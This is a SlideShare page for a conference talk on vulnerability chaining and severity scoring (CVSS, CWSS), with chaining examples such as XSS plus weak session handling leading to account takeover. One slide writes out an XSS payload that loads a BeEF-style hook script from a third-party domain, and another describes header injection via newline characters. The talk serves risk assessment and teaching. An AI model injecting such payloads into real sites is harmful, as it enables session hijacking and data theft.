SlideShare a Scribd company logo
Using Vuln Chaining and Other
Factors for a Better Risk
Perspective
By Curtis Brazzell (Say Hi @curtbraz on Twitter/LinkedIn/Gmail!)
About Me?
 Interested in computers/security from an early age
 Former DBA/Sys Admin (4-6 years)
 Security field for 10+ years (mostly consulting)
 Sr SOC Analyst
 DFIR Lead (Malware Analysis)
 AppSec/Pentesting/Red Team
 Currently an MSC for GuidePoint Security on the AppSec (Tactical) Team
 Passionate about anything security (especially phishing!)
 Want to be known for research/tool contributions (known instead for …. )
 Like to try to put a new spin on old topics
Severity Ratings
 Importance for accuracy to understand risk
 Can be subjective
 Should be challenged!
 Context is everything!
 Unique environments
 External/Internal
 Pre-Auth/Auth
 Roles/Permissions/Privileges
 Exploitability
 Compensating controls / mitigations
 CVSS/CWSS
Severity Ratings
 Common Vulnerability Scoring System (CVSS)
 Open Framework
 Three metric groups:
 Base (What you get by default from most vuln scanners using the NVD)
 Temporal (Metrics that change over time due to external events)
 Environmental (Impact of the vuln on your org)
CVSS v3.0 Ratings
Severity Base Score Range
None 0.0
Low 0.1-3.9
Medium 4.0-6.9
High 7.0-8.9
Critical 9.0-10.0
Severity Ratings
 Common Weakness Scoring System (CWSS)
 Can be used in conjunction with the Common Weakness Risk Analysis Framework (CWRAF)
 Three metric groups:
 Base (Inherent risk, confidence, and strength on controls)
 Attack Surface (Barriers an attacker must overcome to exploit)
 Environmental (Characteristics that are specific to an environment/context)
 Ranges between 0 and 100
Getting it Wrong
 Getting Impact, likelihood of attack, or exploitability wrong (also subjective)
 Missing vulnerabilities or not taking the vuln far enough
 Lack of experience (bug bounties, new hires, etc)
 Lack of time
 Misunderstanding of the environment
 Industry
 What the app does
 Ask for demos!
 May be a non-issue even
 Dangers of getting it wrong
 Too low and it doesn’t get prioritized / risk isn’t acknowledged
 Too high and you take priority from more important issues / dev time / other resources / client or app’s reputation
Vuln Chaining 101
 Combining vulnerabilities for a greater impact!
 More than one lower-serverity issue may be combined for a higher risk rating
 Vulns don’t live in a vacuum!
 Examples:
Vuln Chaining (Examples)
Cross-Site Scripting (XSS) Unprotected Session Cookie
Medium Low
High
OR Local Storage Session
Low
Session Hijacking/Account Takeover
Credit to blog.ropnop.com/storing-tokens-in-browser
Vuln Chaining (Examples)
Cross-Site Scripting (XSS) CORS/CSP Misconfiguration Sensitive Data Leakage / 3P Scripts (Beef)
Medium High
Medium
XSS Payload = <script src=“thirdpartydomain/hook.js”>
Vuln Chaining (Examples)
Header Injection Duplicate Headers / Newline Chars Cross-Site Scripting / Host Poisoning, etc
High
Medium
High
Adding newline characters to break into the body or cut off / duplicate headers
Vuln Chaining (Examples)
Low
High
Low
Session Token in URL /
Password Submission
Low
Session Hijacking/Account Takeover
Missing HSTS Enforcement
No Secure Flag
Vuln Chaining (Examples)
Low
High
Low
Session Fixation
Low
Unauthorized Access via Session Hijacking or Unattended Session
No or Long Session Timeout Concurrent User Sessions
Vuln Chaining (Examples)
Unrestricted File Uploads Authorization Issues (No Auth) XSS/Form Jacking/Open Redirects
Medium Low High
With Auth SSRF/RCE/XXE
High
OR
& IDOR
Vuln Chaining
 Where’s the documentation?
 If I come across a vuln, how do I know what others to look for?
 Experienced people “just know” from memory
 Individual ones (like the previous examples) are often on blogs and public bug bounty reports
 My Idea / Contribution / Project..
 Create a community-driven open resource!
 Why am I doing this?
Vuln Chaining (Mind Map PoC)
OR
Vuln Chaining (Mind Map PoC)
https://atlas.mindmup.com/2021/10/
aa8b215037f611ecbbbb01ecf8fc07de
/vuln_chain/index.html
I published at
Vuln Chaining (Relational Database)
Vuln Chaining (Practical Uses)
 Used by an AppSec resource for more accurate assessments
 Educational Resource / Training | Better Bug Bounties
 Used by an internal org for threat modeling self-assessments
 Examples of use:
Vuln Chaining (Web Form)
Other Uses and Closing Thoughts
 Could be implemented as a tool to import a CSV template (think compliance)
 Would love to see integration into vuln scanners by default
 Burp Extender plugin FTW! (Any takers?)
 Cool card game? (Think Backdoors & Breaches or the OWASP deck)
Thank You! Questions?
 We’re hiring AppSec folks at GuidePoint Security!
 Tactical and Strategic Services

More Related Content

Similar to Using Vuln Chaining and Other Factors for a Better Risk Perspective

Thinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and PreventionThinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and Prevention
David Perkins
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
Including security in devops
Including security in devopsIncluding security in devops
Including security in devops
Jérémy Matos
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
Health Information Privacy and Security
Health Information Privacy and SecurityHealth Information Privacy and Security
Health Information Privacy and Security
Nawanan Theera-Ampornpunt
 
Raging Ransomware Roadshow May
Raging Ransomware Roadshow MayRaging Ransomware Roadshow May
Raging Ransomware Roadshow May
Sophos Benelux
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
Jorge Orchilles
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
amiable_indian
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012DefCamp
 
This is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XThis is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept X
Sophos Benelux
 
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Benelux
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learningBryan Fendley
 
302 Content Server Security Challenges And Best Practices
302   Content Server Security   Challenges And Best Practices302   Content Server Security   Challenges And Best Practices
302 Content Server Security Challenges And Best Practicesphanleson
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best Practices
Clint Edmonson
 
Understanding Application Threat Modelling & Architecture
 Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture
Priyanka Aash
 
Android App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecAndroid App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSec
DroidConTLV
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Tom Eston
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
bilcorry
 
DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0
Shah Sheikh
 
SensePost Threat Modelling
SensePost Threat ModellingSensePost Threat Modelling
SensePost Threat Modelling
SensePost
 

Similar to Using Vuln Chaining and Other Factors for a Better Risk Perspective (20)

Thinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and PreventionThinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and Prevention
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Including security in devops
Including security in devopsIncluding security in devops
Including security in devops
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Health Information Privacy and Security
Health Information Privacy and SecurityHealth Information Privacy and Security
Health Information Privacy and Security
 
Raging Ransomware Roadshow May
Raging Ransomware Roadshow MayRaging Ransomware Roadshow May
Raging Ransomware Roadshow May
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
 
This is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XThis is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept X
 
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learning
 
302 Content Server Security Challenges And Best Practices
302   Content Server Security   Challenges And Best Practices302   Content Server Security   Challenges And Best Practices
302 Content Server Security Challenges And Best Practices
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best Practices
 
Understanding Application Threat Modelling & Architecture
 Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture
 
Android App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecAndroid App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSec
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0
 
SensePost Threat Modelling
SensePost Threat ModellingSensePost Threat Modelling
SensePost Threat Modelling
 

More from Curtis Brazzell

Beyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of CybersecurityBeyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of Cybersecurity
Curtis Brazzell
 
2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell
Curtis Brazzell
 
Phishing 101
Phishing 101Phishing 101
Phishing 101
Curtis Brazzell
 
A Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security ClubA Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security Club
Curtis Brazzell
 
2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable
Curtis Brazzell
 
One, Two... Vulns are Coming for You
One, Two... Vulns are Coming for YouOne, Two... Vulns are Coming for You
One, Two... Vulns are Coming for You
Curtis Brazzell
 

More from Curtis Brazzell (6)

Beyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of CybersecurityBeyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of Cybersecurity
 
2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell
 
Phishing 101
Phishing 101Phishing 101
Phishing 101
 
A Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security ClubA Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security Club
 
2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable
 
One, Two... Vulns are Coming for You
One, Two... Vulns are Coming for YouOne, Two... Vulns are Coming for You
One, Two... Vulns are Coming for You
 

Recently uploaded

Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
Drona Infotech
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
rickgrimesss22
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
Globus
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
XfilesPro
 
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Atelier - Innover avec l’IA Générative et les graphes de connaissancesAtelier - Innover avec l’IA Générative et les graphes de connaissances
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Neo4j
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
Fermin Galan
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Globus
 
Game Development with Unity3D (Game Development lecture 3)
Game Development  with Unity3D (Game Development lecture 3)Game Development  with Unity3D (Game Development lecture 3)
Game Development with Unity3D (Game Development lecture 3)
abdulrafaychaudhry
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
Ortus Solutions, Corp
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
Google
 
Nidhi Software Price. Fact , Costs, Tips
Nidhi Software Price. Fact , Costs, TipsNidhi Software Price. Fact , Costs, Tips
Nidhi Software Price. Fact , Costs, Tips
vrstrong314
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
Adele Miller
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
Matt Welsh
 
AI Genie Review: World’s First Open AI WordPress Website Creator
AI Genie Review: World’s First Open AI WordPress Website CreatorAI Genie Review: World’s First Open AI WordPress Website Creator
AI Genie Review: World’s First Open AI WordPress Website Creator
Google
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
Boni García
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
Deuglo Infosystem Pvt Ltd
 

Recently uploaded (20)

Mobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona InfotechMobile App Development Company In Noida | Drona Infotech
Mobile App Development Company In Noida | Drona Infotech
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
 
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptxTop Features to Include in Your Winzo Clone App for Business Growth (4).pptx
Top Features to Include in Your Winzo Clone App for Business Growth (4).pptx
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024Globus Compute Introduction - GlobusWorld 2024
Globus Compute Introduction - GlobusWorld 2024
 
Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus Compute wth IRI Workflows - GlobusWorld 2024
Globus Compute wth IRI Workflows - GlobusWorld 2024
 
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, BetterWebinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
Webinar: Salesforce Document Management 2.0 - Smarter, Faster, Better
 
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Atelier - Innover avec l’IA Générative et les graphes de connaissancesAtelier - Innover avec l’IA Générative et les graphes de connaissances
Atelier - Innover avec l’IA Générative et les graphes de connaissances
 
Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604Orion Context Broker introduction 20240604
Orion Context Broker introduction 20240604
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
 
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisProviding Globus Services to Users of JASMIN for Environmental Data Analysis
Providing Globus Services to Users of JASMIN for Environmental Data Analysis
 
Game Development with Unity3D (Game Development lecture 3)
Game Development  with Unity3D (Game Development lecture 3)Game Development  with Unity3D (Game Development lecture 3)
Game Development with Unity3D (Game Development lecture 3)
 
BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024BoxLang: Review our Visionary Licenses of 2024
BoxLang: Review our Visionary Licenses of 2024
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
 
Nidhi Software Price. Fact , Costs, Tips
Nidhi Software Price. Fact , Costs, TipsNidhi Software Price. Fact , Costs, Tips
Nidhi Software Price. Fact , Costs, Tips
 
May Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdfMay Marketo Masterclass, London MUG May 22 2024.pdf
May Marketo Masterclass, London MUG May 22 2024.pdf
 
Large Language Models and the End of Programming
Large Language Models and the End of ProgrammingLarge Language Models and the End of Programming
Large Language Models and the End of Programming
 
AI Genie Review: World’s First Open AI WordPress Website Creator
AI Genie Review: World’s First Open AI WordPress Website CreatorAI Genie Review: World’s First Open AI WordPress Website Creator
AI Genie Review: World’s First Open AI WordPress Website Creator
 
APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)APIs for Browser Automation (MoT Meetup 2024)
APIs for Browser Automation (MoT Meetup 2024)
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
 

Using Vuln Chaining and Other Factors for a Better Risk Perspective

  • 1. Using Vuln Chaining and Other Factors for a Better Risk Perspective By Curtis Brazzell (Say Hi @curtbraz on Twitter/LinkedIn/Gmail!)
  • 2. About Me?  Interested in computers/security from an early age  Former DBA/Sys Admin (4-6 years)  Security field for 10+ years (mostly consulting)  Sr SOC Analyst  DFIR Lead (Malware Analysis)  AppSec/Pentesting/Red Team  Currently an MSC for GuidePoint Security on the AppSec (Tactical) Team  Passionate about anything security (especially phishing!)  Want to be known for research/tool contributions (known instead for …. )  Like to try to put a new spin on old topics
  • 3. Severity Ratings  Importance for accuracy to understand risk  Can be subjective  Should be challenged!  Context is everything!  Unique environments  External/Internal  Pre-Auth/Auth  Roles/Permissions/Privileges  Exploitability  Compensating controls / mitigations  CVSS/CWSS
  • 4. Severity Ratings  Common Vulnerability Scoring System (CVSS)  Open Framework  Three metric groups:  Base (What you get by default from most vuln scanners using the NVD)  Temporal (Metrics that change over time due to external events)  Environmental (Impact of the vuln on your org) CVSS v3.0 Ratings Severity Base Score Range None 0.0 Low 0.1-3.9 Medium 4.0-6.9 High 7.0-8.9 Critical 9.0-10.0
  • 5. Severity Ratings  Common Weakness Scoring System (CWSS)  Can be used in conjunction with the Common Weakness Risk Analysis Framework (CWRAF)  Three metric groups:  Base (Inherent risk, confidence, and strength on controls)  Attack Surface (Barriers an attacker must overcome to exploit)  Environmental (Characteristics that are specific to an environment/context)  Ranges between 0 and 100
  • 6. Getting it Wrong  Getting Impact, likelihood of attack, or exploitability wrong (also subjective)  Missing vulnerabilities or not taking the vuln far enough  Lack of experience (bug bounties, new hires, etc)  Lack of time  Misunderstanding of the environment  Industry  What the app does  Ask for demos!  May be a non-issue even  Dangers of getting it wrong  Too low and it doesn’t get prioritized / risk isn’t acknowledged  Too high and you take priority from more important issues / dev time / other resources / client or app’s reputation
  • 7. Vuln Chaining 101  Combining vulnerabilities for a greater impact!  More than one lower-serverity issue may be combined for a higher risk rating  Vulns don’t live in a vacuum!  Examples:
  • 8. Vuln Chaining (Examples) Cross-Site Scripting (XSS) Unprotected Session Cookie Medium Low High OR Local Storage Session Low Session Hijacking/Account Takeover Credit to blog.ropnop.com/storing-tokens-in-browser
  • 9. Vuln Chaining (Examples) Cross-Site Scripting (XSS) CORS/CSP Misconfiguration Sensitive Data Leakage / 3P Scripts (Beef) Medium High Medium XSS Payload = <script src=“thirdpartydomain/hook.js”>
  • 10. Vuln Chaining (Examples) Header Injection Duplicate Headers / Newline Chars Cross-Site Scripting / Host Poisoning, etc High Medium High Adding newline characters to break into the body or cut off / duplicate headers
  • 11. Vuln Chaining (Examples) Low High Low Session Token in URL / Password Submission Low Session Hijacking/Account Takeover Missing HSTS Enforcement No Secure Flag
  • 12. Vuln Chaining (Examples) Low High Low Session Fixation Low Unauthorized Access via Session Hijacking or Unattended Session No or Long Session Timeout Concurrent User Sessions
  • 13. Vuln Chaining (Examples) Unrestricted File Uploads Authorization Issues (No Auth) XSS/Form Jacking/Open Redirects Medium Low High With Auth SSRF/RCE/XXE High OR & IDOR
  • 14. Vuln Chaining  Where’s the documentation?  If I come across a vuln, how do I know what others to look for?  Experienced people “just know” from memory  Individual ones (like the previous examples) are often on blogs and public bug bounty reports  My Idea / Contribution / Project..  Create a community-driven open resource!  Why am I doing this?
  • 15. Vuln Chaining (Mind Map PoC) OR
  • 16. Vuln Chaining (Mind Map PoC) https://atlas.mindmup.com/2021/10/ aa8b215037f611ecbbbb01ecf8fc07de /vuln_chain/index.html I published at
  • 18. Vuln Chaining (Practical Uses)  Used by an AppSec resource for more accurate assessments  Educational Resource / Training | Better Bug Bounties  Used by an internal org for threat modeling self-assessments  Examples of use:
  • 20. Other Uses and Closing Thoughts  Could be implemented as a tool to import a CSV template (think compliance)  Would love to see integration into vuln scanners by default  Burp Extender plugin FTW! (Any takers?)  Cool card game? (Think Backdoors & Breaches or the OWASP deck)
  • 21. Thank You! Questions?  We’re hiring AppSec folks at GuidePoint Security!  Tactical and Strategic Services